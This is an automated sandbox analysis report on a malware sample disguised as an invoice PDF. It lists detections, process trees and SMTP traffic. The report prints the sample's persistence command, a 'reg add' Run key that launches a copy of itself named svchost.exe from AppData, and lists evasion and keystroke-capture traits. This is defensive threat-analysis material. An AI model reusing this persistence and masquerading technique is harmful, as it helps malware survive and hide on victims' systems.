Windows Analysis Report Cab_Invoice_pdf.bin

Overview

General Information

Sample Name: Cab_Invoice_pdf.bin (renamed file extension from bin to exe)
Analysis ID: 534002
MD5: e5dc6a7459fd6ef46afee60318470b03
SHA1: c0a036def9b2d42804c164b156aaf007d9fffa02
SHA256: ea0fd73223e8313da714a6924c1dfae72f2c976935c2b323a6b192c063b0063a

Errors
  • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database
  • Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service
  • Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing
  • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog
  • Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy
  • Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: System File Execution Location Anomaly
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to get notified if a device is plugged in / out
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Sigma detected: Reg Add RUN Key
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events

Process Tree

  • System is w10x64
  • Cab_Invoice_pdf.exe (PID: 2412 cmdline: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • Cab_Invoice_pdf.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
      • cmd.exe (PID: 6780 cmdline: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6860 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe" MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • svchost.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
  • svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
    • svchost.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E5DC6A7459FD6EF46AFEE60318470B03)
  • svchost.exe (PID: 5028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 6308, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3108
Sigma detected: Direct Autorun Keys Modification
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6780, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 6860
Sigma detected: Reg Add RUN Key
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" , ParentImage: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, ParentProcessId: 6476, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"", ProcessId: 6780
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 6308, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3108

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Cab_Invoice_pdf.exe, Virustotal: Detection: 62%
Source: Cab_Invoice_pdf.exe, Metadefender: Detection: 33%
Source: Cab_Invoice_pdf.exe, ReversingLabs: Detection: 58%
Antivirus / Scanner detection for submitted sample
Source: Cab_Invoice_pdf.exe, Avira: detected
Source: 1.3.Cab_Invoice_pdf.exe.10695b0.14.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: Cab_Invoice_pdf.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Cab_Invoice_pdf.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.428528477.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.433779342.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.394749545.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.398010798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393554815.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567499040.000000006EC0E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.412809412.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.425322367.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.435730972.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: d:\agent\_work\9\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569291136.0000000072F21000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.386396710.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.485296621.0000000070131000.00000020.00020000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396174179.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.418168798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.410176305.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.423854182.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393935792.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32api.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567031750.000000006EADF000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.401443735.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.392740878.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567266133.000000006EB5E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.394362827.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569245523.00000000703D3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.421932016.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32gui.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567116932.000000006EB0B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
Source: Binary string: ta.pdb source: Cab_Invoice_pdf.exe
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdbUGP source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.405860680.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569068056.000000006F339000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python38.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566602937.000000006E713000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.439490901.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.395552475.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.411685579.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399919805.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568924352.000000006F2F3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393149261.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1i 8 Dec 2020built on: Tue Jan 5 20:17:31 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.420047349.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.397576219.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.430416405.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 0000000B.00000003.403125486.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399119703.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.441941698.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.407177237.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568546215.000000006EDF8000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.414456474.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.408682511.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 0000000B.00000003.395157867.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb+ source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.432280344.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.397132347.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569138282.0000000070283000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb@@ source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568820397.000000006F2E5000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32event.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568721354.000000006F2D4000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396644442.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.426625427.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.437644496.0000000000E1B000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_6DAAD570 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,PyObject_AsReadBuffer,PyExc_ValueError,PyExc_ValueError,PyErr_Format,PyEval_SaveThread,RegisterDeviceNotificationW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,19_2_6DAAD570
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 1_2_0132715E FindFirstFileExW,1_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 1_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,1_2_0131E260
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 3_2_0132715E FindFirstFileExW,3_2_0132715E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 3_2_0131E260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,3_2_0131E260
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 11_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,11_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 11_2_00BD715E FindFirstFileExW,11_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_00BD715E FindFirstFileExW,19_2_00BD715E
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_00BCE260 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,19_2_00BCE260
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_6DA72F40 PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyList_New,_Py_Dealloc,FindFirstFileW,GetLastError,?PyObject_FromWIN32_FIND_DATAW@@YAPAU_object@@PAU_WIN32_FIND_DATAW@@@Z,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,FindNextFileW,GetLastError,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,FindClose,_Py_Dealloc,19_2_6DA72F40
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_6DA747B0 PyArg_ParseTuple,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,GetLogicalDriveStringsW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z,19_2_6DA747B0
Source: global traffic, TCP traffic: 192.168.2.3:49751 -> 142.250.145.108:587
Source: global traffic, TCP traffic: 192.168.2.3:49775 -> 142.250.145.109:587
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der81
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.derv2
Source: svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
